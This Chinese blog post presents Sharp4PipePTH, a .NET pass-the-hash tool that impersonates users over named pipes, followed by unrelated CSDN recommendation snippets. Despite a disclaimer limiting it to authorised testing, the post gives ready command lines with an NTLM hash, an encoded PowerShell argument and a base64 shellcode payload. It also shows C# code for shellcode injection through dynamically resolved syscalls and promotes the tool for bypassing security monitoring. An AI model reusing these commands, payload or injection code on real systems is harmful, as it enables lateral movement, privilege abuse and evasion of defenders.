.NET 一款通过管道模拟传递哈希的工具

于 2024-10-11 08:30:00 发布
阅读量82 收藏 2
点赞数 3
文章标签: .net 哈希算法 算法 网络 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/142743058
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4PipePTH 是一个用于通过管道模拟和传递哈希值,从而实现以其他用户身份运行二进制文件的工具。这种技术被广泛用于渗透测试和内网攻击场景,通过传递哈希值而非明文密码来实现对目标系统的控制。该工具能够有效利用管道进行模拟,因此可以绕过某些安全检测机制。

图片

03使用方法

Sharp4PipePTH 提供了两种主要的运行方式,具体来说,可以通过命令行指定用户名、内网域的名称、哈希值以及要运行的二进制文件路径和参数来执行操作。

Sharp4PipePTH.exe username:Administrator domain:localhost hash:31d6cfe0d16ae931b73c59d7e0c089c0 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"

另外一种可以通过指定用户名、内网域的名称、哈希值并传递Base64编码的Shellcode来执行命令。具体如下所示。

Sharp4PipePTH.exe username:Administrator domain:localhost hash:31d6cfe0d16ae931b73c59d7e0c089c0 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

04原理解析

在处理Shellcode的执行时,Sharp4PipePTH 首先通过以下代码将Base64编码的Shellcode转换为字节数组,然后在新线程中调用ImpersonateClient方法,执行模拟和代码注入操作

bool flag14 = shellcodegiven;
if (flag14)
{
    byte[] shellcodebytes = Convert.FromBase64String(shellcode);
    Thread t = new Thread(delegate()
    {
        PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes, Args);
    });
    t.Start();
}

ImpersonateClient 方法是工具的核心,通过创建命名管道并将安全描述符设置为允许所有用户访问,从而实现客户端的模拟,具体代码如下

public static void ImpersonateClient(string PipeName, string Binary, byte[] shellcodebytes, string args)
{
    PipeServerImpersonate.SECURITY_ATTRIBUTES securityAttributes = default(PipeServerImpersonate.SECURITY_ATTRIBUTES);
    string pipename = string.Format("\\\\.\\pipe\\{0}", PipeName);
    Console.WriteLine("Create Named Pipe: " + pipename);
    PipeServerImpersonate.ConvertStringSecurityDescriptorToSecurityDescriptor("D:(A;OICI;GA;;;WD)", 1U, out securityAttributes.lpSecurityDescriptor, IntPtr.Zero);
    IntPtr hPipe = PipeServerImpersonate.CreateNamedPipeW(string.Format("\\\\.\\{0}", pipename), 1073741827, 0, 10, 2048, 2048, 0, ref securityAttributes);
}

在这个过程中,工具使用了多个NT API函数,通过动态获取系统调用的方式来分配内存、写入Shellcode、保护内存以及创建新线程来执行代码。

DynamicInvokation.Native.NTSTATUS statusresult = ntOpenProcess(ref hProcess, 2035711U, ref oa, ref ci);
stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtAllocateVirtualMemory");
PipeServerImpersonate.NtAllocateVirtualMemory ntAllocateVirtualMemory = (PipeServerImpersonate.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtAllocateVirtualMemory));
IntPtr baseAddress = IntPtr.Zero;
IntPtr regionSize = (IntPtr)shellcodebytes.Length;
statusresult = ntAllocateVirtualMemory(hProcess, ref baseAddress, IntPtr.Zero, ref regionSize, 12288U, 4U);

stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtWriteVirtualMemory");
PipeServerImpersonate.NtWriteVirtualMemory ntWriteVirtualMemory = (PipeServerImpersonate.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtWriteVirtualMemory));
IntPtr buffer = Marshal.AllocHGlobal(shellcodebytes.Length);
Marshal.Copy(shellcodebytes, 0, buffer, shellcodebytes.Length);
uint bytesWritten = 0U;
statusresult = ntWriteVirtualMemory(hProcess, baseAddress, buffer, (uint)shellcodebytes.Length, ref bytesWritten);

stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtProtectVirtualMemory");
PipeServerImpersonate.NtProtectVirtualMemory ntProtectVirtualMemory = (PipeServerImpersonate.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtProtectVirtualMemory));
uint oldProtect = 0U;
statusresult = ntProtectVirtualMemory(hProcess, ref baseAddress, ref regionSize, 32U, ref oldProtect);

stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtCreateThreadEx");
PipeServerImpersonate.NtCreateThreadEx ntCreateThreadEx = (PipeServerImpersonate.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtCreateThreadEx));
IntPtr hThread = IntPtr.Zero;
statusresult = ntCreateThreadEx(out hThread, DynamicInvokation.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, hProcess, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);

通过这种方式,Sharp4PipePTH 成功将Shellcode注入到目标进程中,并实现了代码的远程执行,如下图所示。

图片

综上,Sharp4PipePTH 常用于模拟不同用户的身份执行命令,如在渗透测试中通过哈希传递技术来绕过用户身份验证,执行特权命令。这种方式不仅可以隐蔽地执行操作,还能规避多种安全监控措施。

05.NET安全知识库

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题。

图片

图片

星球文化20+个专题栏目涵盖了点、线、面、体等知识面!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    

图片

图片

dot.Net安全矩阵
关注
2024年Unity 面试题 |五萬字 二佰道| Unity面试题大全,面试题总结【全网最全,收藏一篇足够面试】
努力前行,总会成为自己心中的那道光
02-23 12万+
正所谓 金三银四 ,又到了找工作的大好时机了,不知道大家有没有意向找一份更好的工作呢~ 之前写了很多Unity的学习和实例文章,但是面试题部分还没有一个系统的整理。 那本篇文章就来整理一下Unity中一些常见的面试题,说不准就会面试的时候就会遇到! 本篇文章会将Unity所有方面的面试资料都融会贯通,绝对是2022年Unity面试领域最实用的文章啦!
.NET 6 史上最全攻略
MicrosoftReactor的博客
04-08 1万+
欢迎使用.NET 6。今天的版本是.NET 团队和社区一年多努力的结果。C# 10 和F# 6 提供了语言改进,使您的代码更简单、更好。性能大幅提升,我们已经看到微软降低了托管云服务的成本。.NET 6 是第一个原生支持Apple Silicon (Arm64) 的版本,并且还针对Windows Arm64 进行了改进。我们构建了一个新的动态配置文件引导优化(PGO) 系统,该系统可提供仅在运行时才可能进行的深度优化。使用dotnet monitor和OpenTelemetry改进了云诊断。WebAssem
.NET 6 史上超全攻略
微软技术栈
03-12 3761
欢迎使用 .NET 6。今天的版本是.NET 团队和社区一年多努力的结果。C# 10 和 F# 6 提供了语言改进,使您的代码更简单、更好。性能大幅提升,我们已经看到微软降低了托管云服务的成本。.NET 6 是第一个原生支持 Apple Silicon (Arm64) 的版本,并且还针对 Windows Arm64 进行了改进。我们构建了一个新的动态配置文件引导优化 (PGO) 系统,该系统可提供仅在运行时才可能进行的深度优化。使用dotnet monitor和OpenTelemetry改进了云诊断。Web
140+ 款常用安全工具分类汇总,全网最全清单,只此一份!(内含工具获取链接,收藏不迷路)
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
06-01 1672
本文汇总了140+款常用的安全工具,覆盖渗透测试的各个环节,黑客及安全从业者的常用工具几乎都涵盖了,若有缺失,欢迎随时留言补充!
.net .netcore高频面试题总结(高级开发、架构师)
热门推荐
IT_ziliang的博客
01-26 1万+
1、10万+大数据处理方式、应用场景。 2、redis在项目中如何使用。 3、消息队列使用的四种场景介绍。 4、redis缓存穿透、缓存击穿、缓存雪崩原因+解决方案。 5、单列模式使用场景。 6、什么是死锁?死锁产生的原因?如何避免死锁? 7、ElasticSearch使用场景。 8、TiDB使用场景。 9、Redis的优点: 支持多种数据结构,如 string(字符串)、 list(双向链表)、dict(hash表)、set(集合)、zset(排序set)、hyperloglog(基数估算
.NET Core面试提问笔记
yu57955的博客
05-15 1428
异步/await是C#中实现异步编程的一种机制,旨在解决可扩展性和性能问题。在C# 5之前,编写异步代码需要使用回调函数或者Event-based Asynchronous Pattern (EAP)。异步/await的原理是基于任务(Task)和异步方法(Async Method)的概念。任务表示一个可以异步执行的操作,它可以返回结果或异常,而异步方法则是使用async关键字标记的方法,它可以包含一个或多个异步任务。当使用await。
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6745
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
asp.net身份验证方式
【Erica W】有问题,就问神奇海螺吧!
01-06 1787
ASP.NET身份验证模式包括Windows、Forms(窗体)、Passport(护照)和None(无)。重点内容 Windows身份验证 常结合应用程序自定义身份验证使用使用这种身份验证模式时,ASP.NET依赖于IIS对用户进行验证,并创建一个Windows访问令牌来表示已通过验证的标识。 Passport身份验证。 使用这种身份验证模式时,ASP.NET使用Microsoft Passp
120+款常用网络安全工具介绍及对应获取地址--持续更新
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
12-13 2610
Source Insight是一个强大的面向项目的编程编辑器、代码浏览器和分析器,通过工程的管理可实现多文件代码中的变量、函数的快速定位和搜索,并且对每个打开的源代码中的变更和函数的程序语句进行彩色显示等功能。是一种简单的bash脚本,用于搜索提取或挂载的固件文件系统中可能感兴趣的内容,如/etc/shadwo,/etc/passwd,/etc/ssl目录,SSL相关文件如.pem,.crt,配置文件,脚本文件,其他bin文件,admin,password等关键词,服务器,URL,IP地址等。
哈希传递到命名管道以进行令牌模拟-.NET开发
05-27
该项目是一个C#工具,用于在用户命名模拟的本地命名管道上使用哈希传递进行身份验证。 有一个博客文章进行解释:SharpNamedPipePTH此项目是一个C#工具,用于在本地命名管道上使用哈希传递进行身份验证,以进行用户...
深入理解ASP.NET Core框架
ASP.NET Core框架是一个开源的、跨平台的web应用程序框架,它是微软公司推出的下一代ASP.NET框架,旨在提供更高效、更灵活的构建Web应用程序的方式。 #### 1.1 ASP.NET Core框架的历史与发展 ASP.NET Core框架最早...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 377
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
【C#生态园】打造现代化跨平台应用:深度解析.NET桌面应用工具
记录我的学习历程
10-02 1961
本文将深入探讨多个.NET桌面应用框架和UI库,包括Eto.Forms、Avalonia、ReactiveUI、MahApps.Metro、MaterialDesignInXAML和Uno Platform。每个工具都有其独特之处,包括核心功能、使用场景和API概览。通过本文的阅读,读者将能够全面了解这些工具,并为自己的项目选择最适合的技术方案。
【C++算法】8.双指针_四数之和
hlyd520的博客
10-04 609
后面的步骤类似,就不多赘述了。解法一:排序+暴力枚举+利用。双指针遇到合适的数继续往后走。解法二:排序+双指针。不满足循环条件,跳出。
打卡第四天 P1081 [NOIP2012 提高组] 开车旅行
hjxxlsx的博客
10-06 423
【代码】打卡第四天 P1081 [NOIP2012 提高组] 开车旅行。
代码随想录算法训练营Day28 | 39. 组合总和、40.组合总和Ⅱ、131.分割回文串
jiabao0520的博客
10-08 1270
训练营第28天:39. 组合总和、40.组合总和Ⅱ、131.分割回文串
c语言练习题2(字符串和函数的使用)
最新发布
m0_74859128的博客
10-10 182
回文函数用于判断一个给定的字符串是否为回文。输入是一个字符数组(字符串),输出是一个布尔值,表示该字符串是否为回文。编写一个 C 语言程序,计算两个整数在二进制表示中有多少位不同。2. 比较这两个整数在二进制表示中的每一位(共32位)是否不同。1. 提示用户输入两个整数。3. 统计不同的位的数量。4. 输出不同的位数。
ICPC-day2(圆方树)
m0_74315028的博客
10-08 270
每次询问两点x, y,求是否存在一个n的排列,使得第一个元素为x,最后一个元素为y,且排列的任意一个前缀、任意一个后缀都连通。可以用圆方树缩点将其变成一颗树,再判断这颗树是否是一条链,x,y是否在这条链的两侧。其实就是求这两个点是否存在两个不相同的路径,同时两者路径的交集是n。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值